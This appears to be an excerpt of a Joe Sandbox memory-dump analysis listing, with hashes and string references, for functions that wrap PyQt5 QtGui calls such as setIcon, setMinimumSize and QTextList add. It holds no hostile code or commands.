isValid(self) -> bool, xrefs: 00007FFD8626EDCB

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?type@Bool_Format@@FromLongText
String ID: QTextBlockFormat$isValid$isValid(self) -> bool
API String ID: 1807932774-1945129929
Opcode ID: 3d30311b60cf11a3e086c42c5c559f76f5c30032d438bb2a3bfda949b39db020
Instruction ID: 6f6cec9da714f38a70ed10e93a88606481e45654a42c68e7e50ccbae306bfc06
Opcode Fuzzy Hash: 3d30311b60cf11a3e086c42c5c559f76f5c30032d438bb2a3bfda949b39db020
Instruction Fuzzy Hash: 8A014C76B08A4681EB009F64E8A84AC33A8FB54BA5F990432CA5D43360DF7DD999C340

Function 00007FFD862A61F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36windowCOMMON

Download Yara Rule

APIs

?setIcon@QStandardItem@@QEAAXAEBVQIcon@@@Z.QT5GUI ref: 00007FFD862A6253

Strings

setIcon(self, aicon: QIcon), xrefs: 00007FFD862A6276
BJ9, xrefs: 00007FFD862A6216
QStandardItem, xrefs: 00007FFD862A6289
setIcon, xrefs: 00007FFD862A6282

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setIcon@Icon@@@Item@@Standard
String ID: BJ9$QStandardItem$setIcon$setIcon(self, aicon: QIcon)
API String ID: 1659873823-3240692480
Opcode ID: e6f0a9ccd25eada6e3d5bd584be0a2c728d3735062c1b99c532945550054e2c5
Instruction ID: e6fed83fad7ed358d5dd32632b18b19c753fd163c1d4f06b19db0bd0140e9e3c
Opcode Fuzzy Hash: e6f0a9ccd25eada6e3d5bd584be0a2c728d3735062c1b99c532945550054e2c5
Instruction Fuzzy Hash: 5F11F576B08E4A81EB00EF55E8986AD33B5FB58BA0F950032CA5D03720DF3DD949C340

Function 00007FFD86254250 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setMinimumSize@QWindow@@QEAAXAEBVQSize@@@Z.QT5GUI ref: 00007FFD862542B3

Strings

setMinimumSize(self, size: QSize), xrefs: 00007FFD862542D6
setMinimumSize, xrefs: 00007FFD862542E2
BJ9, xrefs: 00007FFD86254276
QWindow, xrefs: 00007FFD862542E9

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setMinimumSize@Size@@@Window@@
String ID: BJ9$QWindow$setMinimumSize$setMinimumSize(self, size: QSize)
API String ID: 1804966750-98341282
Opcode ID: 2e1944264c39e630baceb3af008ba104e2f675f109ed0c6c6794e7b0464697db
Instruction ID: 11689085fd90d682aae95ec0d561a2115a9c7c6793359eaa6bc6e33573fac37a
Opcode Fuzzy Hash: 2e1944264c39e630baceb3af008ba104e2f675f109ed0c6c6794e7b0464697db
Instruction Fuzzy Hash: 0211E376B18E4A81EB00EF15E8986AD33A5FB48BA4F950032CA5D43320EF39D95AC700

Function 00007FFD86224240 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?add@QTextList@@QEAAXAEBVQTextBlock@@@Z.QT5GUI ref: 00007FFD862242A3

Strings

QTextList, xrefs: 00007FFD862242D9
add, xrefs: 00007FFD862242D2
BJ9, xrefs: 00007FFD86224266
add(self, block: QTextBlock), xrefs: 00007FFD862242C6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?add@Block@@@List@@
String ID: BJ9$QTextList$add$add(self, block: QTextBlock)
API String ID: 395640385-979475326
Opcode ID: 499ef86d56ae1f481c09350324ce6552319f9741b2d4ff190572f6fe41a64527
Instruction ID: e997ceeea37d29b9ad4ebea42d97595c3262661794d490358460ae8269dadbad
Opcode Fuzzy Hash: 499ef86d56ae1f481c09350324ce6552319f9741b2d4ff190572f6fe41a64527
Instruction Fuzzy Hash: AD11E336B08E46C1EB009F15E8A86AD33A9FB48BA0FA50172CA5D43320EF39D949C740

Function 00007FFD862A0E30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setFormat@QTextObject@@IEAAXAEBVQTextFormat@@@Z.QT5GUI ref: 00007FFD862A0E93

Strings

BJ9, xrefs: 00007FFD862A0E56
setFormat(self, format: QTextFormat), xrefs: 00007FFD862A0EB6
setFormat, xrefs: 00007FFD862A0EC2
QTextFrame, xrefs: 00007FFD862A0EC9

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?setFormat@Format@@@Object@@
String ID: BJ9$QTextFrame$setFormat$setFormat(self, format: QTextFormat)
API String ID: 760775155-2643208564
Opcode ID: 8651a71671a4fb65f9ecfed21506fecc168c23540e60f314ce66b0ddb1ce66c5
Instruction ID: 14460e42e104603aa3edfee5c15d149c777ea5dc0f9b6f8052f9d66332f49b4b
Opcode Fuzzy Hash: 8651a71671a4fb65f9ecfed21506fecc168c23540e60f314ce66b0ddb1ce66c5
Instruction Fuzzy Hash: AC11F576B18F4681EB009F15E8986AD33B9FB48BA4F954072CA5D43320DF39D95AC340

Function 00007FFD86258F40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?swap@QRegion@@QEAAXAEAV1@@Z.QT5GUI ref: 00007FFD86258F9C

Strings

swap(self, other: QTextCursor), xrefs: 00007FFD86258FBF
BJ9, xrefs: 00007FFD86258F6E
swap, xrefs: 00007FFD86258FCB
QTextCursor, xrefs: 00007FFD86258FD2

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?swap@Region@@V1@@
String ID: BJ9$QTextCursor$swap$swap(self, other: QTextCursor)
API String ID: 2712419754-370544420
Opcode ID: d8d654d538105cd4d8bbc6abf54b7eb1fe8ff35d34679cbdde36216f97cbfa1f
Instruction ID: 68bef3661766c14becda42e6f70ba2311329d1bc83e7b41db9d07788bc271d35
Opcode Fuzzy Hash: d8d654d538105cd4d8bbc6abf54b7eb1fe8ff35d34679cbdde36216f97cbfa1f
Instruction Fuzzy Hash: 8311C276B18E4681EB00AF15E8A96AD33A5FB48BA4F954132CA5D43320EF39D959C740

Function 00007FFD86295050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?addPath@QPainterPath@@QEAAXAEBV1@@Z.QT5GUI ref: 00007FFD862950AC

Strings

BJ9, xrefs: 00007FFD8629507E
addPath(self, path: QPainterPath), xrefs: 00007FFD862950CF
QPainterPath, xrefs: 00007FFD862950E2
addPath, xrefs: 00007FFD862950DB

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?addPainterPath@Path@@V1@@
String ID: BJ9$QPainterPath$addPath$addPath(self, path: QPainterPath)
API String ID: 3500574573-2308021196
Opcode ID: aeb709bbd63a5311a9f18678cb6414f6ccf895b4bda42904c142a3a8acd296d7
Instruction ID: 99d21f455b2aa5c35af50bd6353819443ca7c758ec0423d66a6d1382fd511b39
Opcode Fuzzy Hash: aeb709bbd63a5311a9f18678cb6414f6ccf895b4bda42904c142a3a8acd296d7
Instruction Fuzzy Hash: 0F110076B08E4681EB00EF14E8A86AD33B5FB48BA0F950032CA5D43320DF39E94AC740

Function 00007FFD86264CE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?swap@QRegion@@QEAAXAEAV1@@Z.QT5GUI ref: 00007FFD86264D3C

Strings

swap(self, other: QPen), xrefs: 00007FFD86264D5F
BJ9, xrefs: 00007FFD86264D0E
swap, xrefs: 00007FFD86264D6B
QPen, xrefs: 00007FFD86264D72

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?swap@Region@@V1@@
String ID: BJ9$QPen$swap$swap(self, other: QPen)
API String ID: 2712419754-4185707986
Opcode ID: b4f5d16578498271f3e5926b9cf5c6b07a2ba2d99744d5e7f6d2e27018583a23
Instruction ID: ac5c9905a1af1dbd434e9a7b6e1fa409768a2db1184a4751746f628deaa4d4ee
Opcode Fuzzy Hash: b4f5d16578498271f3e5926b9cf5c6b07a2ba2d99744d5e7f6d2e27018583a23
Instruction Fuzzy Hash: 6D11D376B18F4681EB00DF15E8996AD33B5FB48BA0F954136CA5D03320DF39E95AC740

Function 00007FFD86246E90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?leftCursorPosition@QTextLayout@@QEBAHH@Z.QT5GUI ref: 00007FFD86246EE7
PyLong_FromLong.PYTHON3 ref: 00007FFD86246EEF

Strings

leftCursorPosition, xrefs: 00007FFD86246F0D
QTextLayout, xrefs: 00007FFD86246F14
leftCursorPosition(self, oldPos: int) -> int, xrefs: 00007FFD86246F01

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?leftCursorFromLayout@@LongLong_Position@Text
String ID: QTextLayout$leftCursorPosition$leftCursorPosition(self, oldPos: int) -> int
API String ID: 1864047510-505257837
Opcode ID: 587cf303c044f048aa624caf6b762ee562eb0330cd6657d8bbb30ca5b98ccaf1
Instruction ID: e8b0a88731ebf243df4cfa6c139f8322c962789d3c6ae310051a9dc35587c648
Opcode Fuzzy Hash: 587cf303c044f048aa624caf6b762ee562eb0330cd6657d8bbb30ca5b98ccaf1
Instruction Fuzzy Hash: 1A011775B18E46D2EB00EF24E8A8AAD33A5FB44B64FA54172CA5D43320DF3DD95AC700

Function 00007FFD86256AD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?geometry@QWindow@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFD86256B20
PyLong_FromLong.PYTHON3 ref: 00007FFD86256B2D

Strings

width(self) -> int, xrefs: 00007FFD86256B3F
QWindow, xrefs: 00007FFD86256B52
width, xrefs: 00007FFD86256B4B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

